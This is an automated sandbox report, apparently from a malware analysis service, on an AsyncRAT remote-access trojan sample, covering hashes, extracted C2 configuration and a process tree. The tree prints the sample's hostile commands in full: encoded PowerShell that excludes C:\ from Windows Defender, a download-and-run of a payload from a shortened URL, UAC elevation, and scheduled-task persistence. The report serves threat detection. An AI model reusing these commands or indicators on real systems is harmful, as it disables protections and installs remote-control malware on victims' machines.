Overview

overview

10

Static

static

3

revershesh...TO.exe

windows7-x64

10

revershesh...TO.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 12:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    reversheshellb64batTO.exe

  • Size

    88KB

  • MD5

    aa8d4f9a7cea9c7c8de61478ae5a7f81

  • SHA1

    5b8ce5f94b702731877e55822dfb505af4332fa6

  • SHA256

    cb89e6fafecf411a75df6cb06b2302e8f3c9696232dbdff6b25b3d6bec635c91

  • SHA512

    2f54a16ad0a7a0ec8c6ea4f08cd28c587a6ac29421ec1433150e80e164d48bdd312480a86b15477deee4e11f3cf331823400a9fc858451fc4eaf59213577c982

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf3xP+:fq6+ouCpk2mpcWJ0r+QNTBf3B+

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/VIRGPLOAD

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

holefo2785-22820.portmap.host:22820

holefo2785-22820.portmap.host:6606
Mutex

Oma7kBAtvlxY

Attributes
  • delay

    3

  • install

    true

  • install_file

    discord.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
    "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C39.tmp\5C3A.tmp\5C3B.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h -command ""
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:6108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe' -ArgumentList 'am_admin'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3144
        • C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe
          "C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe" am_admin
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3040
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\reversheshellb64batTO.exe am_admin"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5852
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4616
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2668
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5364
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5696
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
                7⤵
                  PID:436
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBWAEkAUgBHAFAATABPAEEARAAiAA0ACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
                6⤵
                • Blocklisted process makes network request
                • Downloads MZ/PE file
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3184
                • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1652
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"' & exit
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3900
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"'
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2536
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7EF4.tmp.bat""
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1552
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 3
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:6120
                    • C:\Users\Admin\AppData\Roaming\discord.exe
                      "C:\Users\Admin\AppData\Roaming\discord.exe"
                      9⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3932

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      9a03ce3d82425c856b001b4f8d18c5b1

      SHA1

      782d7f256bf8799c7ec1bd7fabfb9bed2ac5b65a

      SHA256

      2aed929b84cc293687adcff261f734d3309f5d4040b7b9e9793da579c30e18bd

      SHA512

      27537befcc20e8f99a7e67da04c48f9ce31d0fdfb971c509af84141a6d0fbb8c1228edc3785aa9ca73b0d573adc5ac94e26afe636745a41b10bedf98c419e94b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\5C39.tmp\5C3A.tmp\5C3B.bat
      Filesize

      1KB

      MD5

      67ce8577d16577bede59e604f52ec2de

      SHA1

      c0a7b9d0f0082d227a2e9ae125c09afa08b30ec6

      SHA256

      1cf31abdbb120a1449dd41cbdcf6a183f136dfb525c255c9a5793df5c5a84ba6

      SHA512

      a2491767e88064922bfc42740ec983b04097339cac9fdb93e11cc1fd6344ad52a4bb1cadb3a0a7e11578d84b4ce4da85b04388ba72c620b425a824d70e2fcd3e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
      Filesize

      48KB

      MD5

      f814cb9c71d35f8bd503b6d9949aca22

      SHA1

      96cb19b70bbcab9627cc3c37a384287a1162dc7c

      SHA256

      d5965c899e5413e91ab7b75669b35d6797b5462c64f99f217a4014e8e4deafbd

      SHA512

      072b7a7cc5be22435d9c498f85479ac51891dbcb2fac8305236f156bada662398e35d53507cc5c4c5094f7bb7c979a47136249f9e7094dd652a1f9e5fb1c3a5f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_soah33kb.xae.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp7EF4.tmp.bat
      Filesize

      151B

      MD5

      cff45ab7bab920e1f582726474bb15cc

      SHA1

      632c224e50ee02bc28855ef1a31becbaf87d24ec

      SHA256

      67a511e012265fd0b3750ea9d3adc861bfd2295eb187ce65d74a056fd81d7b21

      SHA512

      b8303dc16d7588149b9fd0018ae7ce6e1c4ade3101b3099a01320c999d787caae1d48d85c910b615c0c743a9d0dbb6c9089146b36e00418c8b088bdd00700fa3

      Download Submit

    • memory/1652-100-0x00000000057A0000-0x000000000583C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1652-99-0x0000000005100000-0x0000000005166000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1652-98-0x0000000000250000-0x0000000000262000-memory.dmp

      Filesize

      72KB

      Download

    • memory/6108-12-0x0000027AF47D0000-0x0000027AF47F2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/6108-17-0x00007FFAB5DB0000-0x00007FFAB6871000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6108-16-0x00007FFAB5DB0000-0x00007FFAB6871000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6108-13-0x00007FFAB5DB0000-0x00007FFAB6871000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/6108-2-0x00007FFAB5DB3000-0x00007FFAB5DB5000-memory.dmp

      Filesize

      8KB

      Download